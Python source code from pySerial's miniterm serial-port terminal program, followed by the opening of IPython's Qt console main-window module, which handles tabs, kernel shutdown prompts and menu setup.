return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
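# Hedged illustration (not part of pySerial): Miniterm chains these classes, so
# outgoing text passes through every transformation in order and incoming text
# through the reverse order (see update_transformations below). For example,
# with --eol crlf and --filter colorize:
#
#     chain = [CRLF(), Colorize()]
#     text = 'hello\n'
#     for t in chain:            # tx path
#         text = t.tx(text)      # CRLF.tx -> 'hello\r\n'; Colorize.tx is a no-op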
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=115200, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
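# Illustrative sketch (not part of the original file, never called): the default
# arguments of main() above allow a thin wrapper script, e.g. a "miniterm-my-device.py",
# to pre-select a port and baud rate while still letting the command line override them.
# The port name and baud rate below are assumptions, not values taken from this file.
def example_miniterm_my_device():
    main(default_port='/dev/ttyUSB0', default_baudrate=9600)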
|
mainwindow.py
|
"""The Qt MainWindow for the QtConsole
This is a tabbed pseudo-terminal of IPython sessions, with a menu bar for
common actions.
Authors:
* Evan Patterson
* Min RK
* Erik Tollerud
* Fernando Perez
* Bussonnier Matthias
* Thomas Kluyver
* Paul Ivanov
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib imports
import sys
import re
import webbrowser
import ast
from threading import Thread
# System library imports
from IPython.external.qt import QtGui,QtCore
def background(f):
"""call a function in a simple thread, to prevent blocking"""
t = Thread(target=f)
t.start()
return t
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class MainWindow(QtGui.QMainWindow):
#---------------------------------------------------------------------------
# 'object' interface
#---------------------------------------------------------------------------
_magic_menu_dict = {}
def __init__(self, app,
confirm_exit=True,
new_frontend_factory=None, slave_frontend_factory=None,
):
""" Create a tabbed MainWindow for managing IPython FrontendWidgets
Parameters
----------
app : reference to QApplication parent
confirm_exit : bool, optional
Whether we should prompt on close of tabs
new_frontend_factory : callable
A callable that returns a new IPythonWidget instance, attached to
its own running kernel.
slave_frontend_factory : callable
A callable that takes an existing IPythonWidget, and returns a new
IPythonWidget instance, attached to the same kernel.
"""
super(MainWindow, self).__init__()
self._kernel_counter = 0
self._app = app
self.confirm_exit = confirm_exit
self.new_frontend_factory = new_frontend_factory
self.slave_frontend_factory = slave_frontend_factory
self.tab_widget = QtGui.QTabWidget(self)
self.tab_widget.setDocumentMode(True)
self.tab_widget.setTabsClosable(True)
self.tab_widget.tabCloseRequested[int].connect(self.close_tab)
self.setCentralWidget(self.tab_widget)
# hide tab bar at first, since we have no tabs:
self.tab_widget.tabBar().setVisible(False)
# prevent focus in tab bar
self.tab_widget.setFocusPolicy(QtCore.Qt.NoFocus)
def update_tab_bar_visibility(self):
""" update visibility of the tabBar depending of the number of tab
0 or 1 tab, tabBar hidden
2+ tabs, tabBar visible
send a self.close if number of tab ==0
need to be called explicitly, or be connected to tabInserted/tabRemoved
"""
if self.tab_widget.count() <= 1:
self.tab_widget.tabBar().setVisible(False)
else:
self.tab_widget.tabBar().setVisible(True)
if self.tab_widget.count()==0 :
self.close()
@property
def next_kernel_id(self):
"""constantly increasing counter for kernel IDs"""
c = self._kernel_counter
self._kernel_counter += 1
return c
@property
def active_frontend(self):
return self.tab_widget.currentWidget()
def create_tab_with_new_frontend(self):
"""create a new frontend and attach it to a new tab"""
widget = self.new_frontend_factory()
self.add_tab_with_frontend(widget)
def create_tab_with_current_kernel(self):
"""create a new frontend attached to the same kernel as the current tab"""
current_widget = self.tab_widget.currentWidget()
current_widget_index = self.tab_widget.indexOf(current_widget)
current_widget_name = self.tab_widget.tabText(current_widget_index)
widget = self.slave_frontend_factory(current_widget)
if 'slave' in current_widget_name:
# don't keep stacking slaves
name = current_widget_name
else:
name = '(%s) slave' % current_widget_name
self.add_tab_with_frontend(widget,name=name)
def close_tab(self,current_tab):
""" Called when you need to try to close a tab.
It takes the number of the tab to be closed as argument, or a reference
to the widget inside this tab
"""
# let's be sure "tab" and "closing widget" are respectively the index
# of the tab to close and a reference to the frontend to close
if type(current_tab) is not int :
current_tab = self.tab_widget.indexOf(current_tab)
closing_widget=self.tab_widget.widget(current_tab)
# While being closed, the widget might re-send a request to be closed again, but it
# will already have been deleted by the time that event is processed, so we need to
# check that the widget still exists and skip if not. One example of this is when
# 'exit' is sent in a slave tab: 'exit' will be re-sent by this function on the
# master widget, which asks all slave widgets to exit.
if closing_widget==None:
return
#get a list of all slave widgets on the same kernel.
slave_tabs = self.find_slave_widgets(closing_widget)
keepkernel = None #Use the prompt by default
if hasattr(closing_widget,'_keep_kernel_on_exit'): #set by exit magic
keepkernel = closing_widget._keep_kernel_on_exit
# If the signal was sent by the exit magic (_keep_kernel_on_exit exists and is not None),
# we set the local slave tabs' _hidden to True to avoid prompting for a kernel restart
# when they get the signal, and then "forward" the 'exit' to the main window.
if keepkernel is not None:
for tab in slave_tabs:
tab._hidden = True
if closing_widget in slave_tabs:
try :
self.find_master_tab(closing_widget).execute('exit')
except AttributeError:
self.log.info("Master already closed or not local, closing only current tab")
self.tab_widget.removeTab(current_tab)
self.update_tab_bar_visibility()
return
kernel_manager = closing_widget.kernel_manager
if keepkernel is None and not closing_widget._confirm_exit:
# don't prompt, just terminate the kernel if we own it
# or leave it alone if we don't
keepkernel = closing_widget._existing
if keepkernel is None: #show prompt
if kernel_manager and kernel_manager.channels_running:
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if closing_widget._may_close:
msg = "You are closing the tab : "+'"'+self.tab_widget.tabText(current_tab)+'"'
info = "Would you like to quit the Kernel and close all attached Consoles as well?"
justthis = QtGui.QPushButton("&No, just this Tab", self)
justthis.setShortcut('N')
closeall = QtGui.QPushButton("&Yes, close all", self)
closeall.setShortcut('Y')
# allow ctrl-d ctrl-d exit, like in terminal
closeall.setShortcut('Ctrl+D')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(justthis, QtGui.QMessageBox.NoRole)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
if reply == 1: # close All
for slave in slave_tabs:
background(slave.kernel_manager.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
closing_widget.execute("exit")
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
elif reply == 0: # close Console
if not closing_widget._existing:
# Have kernel: don't quit, just close the tab
closing_widget.execute("exit True")
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
else:
reply = QtGui.QMessageBox.question(self, title,
"Are you sure you want to close this Console?"+
"\nThe Kernel and other Consoles will remain active.",
okay|cancel,
defaultButton=okay
)
if reply == okay:
self.tab_widget.removeTab(current_tab)
elif keepkernel: #close console but leave kernel running (no prompt)
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
else: #close console and kernel (no prompt)
self.tab_widget.removeTab(current_tab)
if kernel_manager and kernel_manager.channels_running:
for slave in slave_tabs:
background(slave.kernel_manager.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
kernel_manager.shutdown_kernel()
background(kernel_manager.stop_channels)
self.update_tab_bar_visibility()
def add_tab_with_frontend(self,frontend,name=None):
""" insert a tab with a given frontend in the tab bar, and give it a name
"""
if not name:
name = 'kernel %i' % self.next_kernel_id
self.tab_widget.addTab(frontend,name)
self.update_tab_bar_visibility()
self.make_frontend_visible(frontend)
frontend.exit_requested.connect(self.close_tab)
def next_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()+1))
def prev_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()-1))
def make_frontend_visible(self,frontend):
widget_index=self.tab_widget.indexOf(frontend)
if widget_index > 0 :
self.tab_widget.setCurrentIndex(widget_index)
def find_master_tab(self,tab,as_list=False):
"""
Try to return the frontend that owns the kernel attached to the given widget/tab.
Only finds frontends owned by the current application. Selection is based on the
kernel's connection file and might be inaccurate if several kernels on different
IPs use the same port number.
This function does the tab-number/widget conversion if needed.
Might return None if there is no master widget (non-local kernel).
Will crash IPython (assertion error) if more than one master widget is found.
When as_list is set to True, always returns a list of the widget(s) owning the
kernel. The list might be empty or contain several widgets.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_manager
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# Widgets that are candidates to own the kernel all share the same connection file
# as the current widget and should have a _may_close attribute.
filtered_widget_list = [ widget for widget in widget_list if
widget.kernel_manager.connection_file == km.connection_file and
hasattr(widget,'_may_close') ]
# the master widget is the one that may close the kernel
master_widget= [ widget for widget in filtered_widget_list if widget._may_close]
if as_list:
return master_widget
assert(len(master_widget)<=1 )
if len(master_widget)==0:
return None
return master_widget[0]
def find_slave_widgets(self,tab):
"""return all the frontends that do not own the kernel attached to the given widget/tab.
Only find frontends owned by the current application. Selection
based on connection file of the kernel.
This function does the conversion tabNumber/widget if needed.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_manager
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# Widgets that are candidates not to own the kernel all share the same connection file as the current widget.
filtered_widget_list = ( widget for widget in widget_list if
widget.kernel_manager.connection_file == km.connection_file)
# Get the list of all widgets owning the kernel and remove them from the previous
# candidates (sets might be cleaner here).
master_widget_list = self.find_master_tab(tab, as_list=True)
slave_list = [widget for widget in filtered_widget_list if widget not in master_widget_list]
return slave_list
# Populate the menu bar with common actions and shortcuts
def add_menu_action(self, menu, action, defer_shortcut=False):
"""Add action to menu as well as self
So that when the menu bar is invisible, its actions are still available.
If defer_shortcut is True, set the shortcut context to widget-only,
where it will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if defer_shortcut:
action.setShortcutContext(QtCore.Qt.WidgetShortcut)
def init_menu_bar(self):
#create menu in the order they should appear in the menu bar
self.init_file_menu()
self.init_edit_menu()
self.init_view_menu()
self.init_kernel_menu()
self.init_magic_menu()
self.init_window_menu()
self.init_help_menu()
def init_file_menu(self):
self.file_menu = self.menuBar().addMenu("&File")
self.new_kernel_tab_act = QtGui.QAction("New Tab with &New kernel",
self,
shortcut="Ctrl+T",
triggered=self.create_tab_with_new_frontend)
self.add_menu_action(self.file_menu, self.new_kernel_tab_act)
self.slave_kernel_tab_act = QtGui.QAction("New Tab with Sa&me kernel",
self,
shortcut="Ctrl+Shift+T",
triggered=self.create_tab_with_current_kernel)
self.add_menu_action(self.file_menu, self.slave_kernel_tab_act)
self.file_menu.addSeparator()
self.close_action=QtGui.QAction("&Close Tab",
self,
shortcut=QtGui.QKeySequence.Close,
triggered=self.close_active_frontend
)
self.add_menu_action(self.file_menu, self.close_action)
self.export_action=QtGui.QAction("&Save to HTML/XHTML",
self,
shortcut=QtGui.QKeySequence.Save,
triggered=self.export_action_active_frontend
)
self.add_menu_action(self.file_menu, self.export_action, True)
self.file_menu.addSeparator()
printkey = QtGui.QKeySequence(QtGui.QKeySequence.Print)
if printkey.matches("Ctrl+P") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
printkey = "Ctrl+Shift+P"
self.print_action = QtGui.QAction("&Print",
self,
shortcut=printkey,
triggered=self.print_action_active_frontend)
self.add_menu_action(self.file_menu, self.print_action, True)
if sys.platform != 'darwin':
# OSX always has Quit in the Application menu, only add it
# to the File menu elsewhere.
self.file_menu.addSeparator()
self.quit_action = QtGui.QAction("&Quit",
self,
shortcut=QtGui.QKeySequence.Quit,
triggered=self.close,
)
self.add_menu_action(self.file_menu, self.quit_action)
def init_edit_menu(self):
self.edit_menu = self.menuBar().addMenu("&Edit")
self.undo_action = QtGui.QAction("&Undo",
self,
shortcut=QtGui.QKeySequence.Undo,
statusTip="Undo last action if possible",
triggered=self.undo_active_frontend
)
self.add_menu_action(self.edit_menu, self.undo_action)
self.redo_action = QtGui.QAction("&Redo",
self,
shortcut=QtGui.QKeySequence.Redo,
statusTip="Redo last action if possible",
triggered=self.redo_active_frontend)
self.add_menu_action(self.edit_menu, self.redo_action)
self.edit_menu.addSeparator()
self.cut_action = QtGui.QAction("&Cut",
self,
shortcut=QtGui.QKeySequence.Cut,
triggered=self.cut_active_frontend
)
self.add_menu_action(self.edit_menu, self.cut_action, True)
self.copy_action = QtGui.QAction("&Copy",
self,
shortcut=QtGui.QKeySequence.Copy,
triggered=self.copy_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_action, True)
self.copy_raw_action = QtGui.QAction("Copy (&Raw Text)",
self,
shortcut="Ctrl+Shift+C",
triggered=self.copy_raw_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_raw_action, True)
self.paste_action = QtGui.QAction("&Paste",
self,
shortcut=QtGui.QKeySequence.Paste,
